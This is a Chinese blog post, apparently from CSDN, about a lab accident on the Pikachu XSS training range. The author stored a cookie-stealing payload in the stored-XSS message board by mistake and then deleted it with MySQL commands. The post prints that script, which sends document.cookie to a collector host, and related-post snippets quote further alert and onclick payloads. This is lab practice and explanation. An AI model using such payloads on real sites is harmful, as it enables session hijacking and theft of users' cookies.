存储型XSS清除方法

最新推荐文章于 2023-05-04 17:19:18 发布
最新推荐文章于 2023-05-04 17:19:18 发布
阅读量1.9k 收藏 6
点赞数 5
分类专栏: 笔记 渗透 pikachu 文章标签: 数据库 cookie mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50339832/article/details/117623519
版权
渗透 同时被 3 个专栏收录
39 篇文章 2 订阅
订阅专栏
笔记
25 篇文章 0 订阅
订阅专栏
pikachu
14 篇文章 0 订阅
订阅专栏

今天也是被自己气哭的一天

今天做XSS盗取cookie实验

<script>document.location='http://192.168.241.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

就是用这个罪恶的payload

我眼花之下把他输入了存储型的XSS里:(

导致我一进去存储型就给我跳转到首页

刚开始我以为被攻击了,查看源代码发现居然插入了我的payload

解决办法:

打开mysql数据库

use pikachu

show tables

select * from message 会看到你插入的payload

delete from message where id=87 删掉他

这就好了

存储型XSS会把键入的信息永久保存在数据库里

可见这种存储型的xss的危害是非常大的,因为它被存储到了后台数据库,每一个打开这个页面的用户都会因此而“中招”,这造成的是一种持久性的危害。

玉米同学
关注
  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
pikachu-XSS
koala_king的博客
01-16 215
pikachu
xss php 转义_php 过滤存储XSS攻击
weixin_35762215的博客
03-09 136
最近做的项目被测试测出了存在存储XSS,至此记录一下,问题出在了 input 框 :payload:"a" οnclick=alert(1)>也做了一些XSS过滤,但是不全,有从网上找了一些,弄了一个简单粗暴的;后台接收 input 框字符串内容,存在被攻击,便整理了一个比较粗暴的方法//过滤存储XSS攻击//过滤存储XSS攻击public function safe_filter(&...
网站遭遇XSS注入如何排查及解决
weixin_54232686的博客
05-04 1240
预防XSS注入及解决
PHP 去除XSS攻击的注入代码
qq_39004843的博客
03-26 298
//去除输入的XSS攻击代码 function RemoveXSS($val) { // remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed // this prevents some character re-spacing such as <java\0script&g...
pikachu--xss
qq_43660551的博客
04-11 376
alert(document.cookie),f12未发现有用信息,右键看下网页源码,发现被过滤了。两个框输入1
SpringBoot整合XSS.zip
04-30
XSS攻击通常分为反射存储和DOM三种类。 2. **防御XSS**:防御XSS攻击的主要手段是过滤、编码和验证输入。SpringBoot可以通过集成XssFilter来实现这一目标。XssFilter可以在每个HTTP请求处理之前对请求...
Web安全之XSS攻击与防御小结
10-17
存储XSS则更为严重,因为恶意脚本被永久地存储在服务器上,任何访问该页面的用户都可能遭受攻击,无需再次提交XSS代码。 针对XSS攻击,开发者可以采取一系列防御措施。首先,编码是最基础的防护手段,对用户...
xss跨站脚本攻击与预防
11-04
XSS攻击的类主要包括三种:反射XSS存储XSS和DOMXSS。反射XSS是通过诱使用户点击含有恶意脚本的链接,然后在当前页面上执行;存储XSS则更为严重,因为恶意脚本被存储在服务器上,任何访问该页面的用户...
第26天:WEB漏洞-XSS跨站之订单及Shell箱子反杀记1
08-03
1. **存储XSS(Persistent XSS)**:恶意脚本被存储在服务器端,并在多个用户访问同一页面时执行。 2. **反射XSS(Non-Persistent XSS)**:恶意脚本通过URL参数传递,只有当用户点击特殊构造的链接时才会执行。...
xss-labs靶场,直接放到www目录下直接用,超方便
09-24
2. **存储XSS**:恶意脚本被存储在服务器端,当其他用户查看含有该脚本的页面时,脚本被执行。 3. **DOMXSS**:不涉及服务器,而是利用浏览器的DOM(Document Object Model)特性,通过修改页面的DOM结构来注入...
存储Xss成因及挖掘方法
02-21
存储Xss成因及挖掘方法
【web-攻击用户】(9.1.5)查找并利用XSS漏洞--存储
08-27 705
【查找并利用XSS漏洞】存储
Dvwa之存储XSS攻击全级别学习笔记
Mbys_Lettuce的博客
09-19 1966
和好像被过滤掉了,会不会像反射一样,只是过滤了,只要复写或者大小写可以攻击了呢?把写入内容修改成alert(document.cookie)或者alert(document.cookie)
Web安全笔记:XSS跨站脚本
ZTao-z的博客
11-17 370
Web安全:XSS跨站脚本
XSS注入方式和逃避XSS过滤的常用方法(整理)
weixin_34050427的博客
09-16 756
(转自黑吧安全网http://www.myhack58.com/) web前端开发常见的安全问题就是会遭遇XSS注入,而常见的XSS注入有以下2种方式: 一、html标签注入 这是最常见的一种,主要入口为表单项(一般就是正则过滤不周全)、内联样式表(exploer) 正则过滤的解决办法,php一般会使用htmlspecialchars或者html...
XSS 存储漏洞修复
热门推荐
qq_26244285的博客
01-20 1万+
收到检查报告,说是有xss 存储漏洞,百度看了很多资料总结两句话 1、保存数据库内容需要过滤 2、设置过滤器 思路:我们需要一个过滤前在Controller方法调用前对所有参数进行检查,过滤替换。 过滤》替换非法参数》继续Controller调用。 网上得思路基本是替换,没看到拒绝请求,因为过滤得检查很多很容易被拒绝非常不友好 做法spring拦截器:检查非法内容或特定内容拒绝请求,使用sprintboot得做法很简单,做一个aop切面定义一个定义一个拦截器 import javax..
web ---- 存储 XSS
L0g1c的博客
07-23 1728
Js操纵的主体是浏览器,窃取的当然是浏览器的Cookie,所以有XSS的地方,你如果抓包改Cookie去访问,XSS是吃不到你修改过的Cookie,其实你访问的时候抓包就可以看到,第一次访问正常页面,第二次会GET传参访问XSS平台。以前也搭建过XSS平台,其实后台可以看到所有用户的Cookie,当你用了别人的XSS平台其实就要注意信息泄露这个问题,而且访问XSS平台和XSS页面建议使用无痕,天知道,他们会不会在脚本里面做手脚。...
pikachu靶场练习——XSS详解
qq_42176496的博客
09-04 2689
pikachu靶场 XSS详解
DVWA的使用6--XSS(Stored)(存储跨站脚本)
StoriesWine
03-27 4922
DVWA的使用6–XSS(Stored)(存储跨站脚本) Stored Cross Site Scripting(XSS存储跨站脚本攻击会把用户输入的数据存储在服务器端。如果web应用程序从恶意用户处收集了输入数据并将这些数据存储数据库以供以后使用,就会发生储存式跨站点脚本。 1).low级别 源码: trim函数移除字符串两侧的空白字符或其他预定义字符,预定义字符包括、\...
反射XSS存储XSS的区别
最新发布
05-24
反射XSS存储XSS都是常见的Web攻击类,它们的区别在于攻击者注入恶意代码的方式和攻击的后果。 反射XSS是指攻击者通过构造特定的URL链接或提交包含恶意脚本的表单数据等方式,将恶意脚本注入到网站的响应,从而使得用户在访问该链接或提交表单后,恶意脚本会被浏览器解析执行,达到攻击的目的。这种攻击方式通常只会影响到当前用户。 而存储XSS则是指攻击者将恶意脚本注入到网站的数据库或其他存储介质,当用户访问包含恶意脚本的页面时,恶意脚本会被加载并执行,从而危害到所有访问该页面的用户。这种攻击方式通常会对网站的数据造成破坏或者窃取用户的敏感信息。 因此,反射XSS主要是针对单个用户的攻击,攻击效果比较有限,而存储XSS则是一种更为严重的攻击方式,可以对整个网站产生影响。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值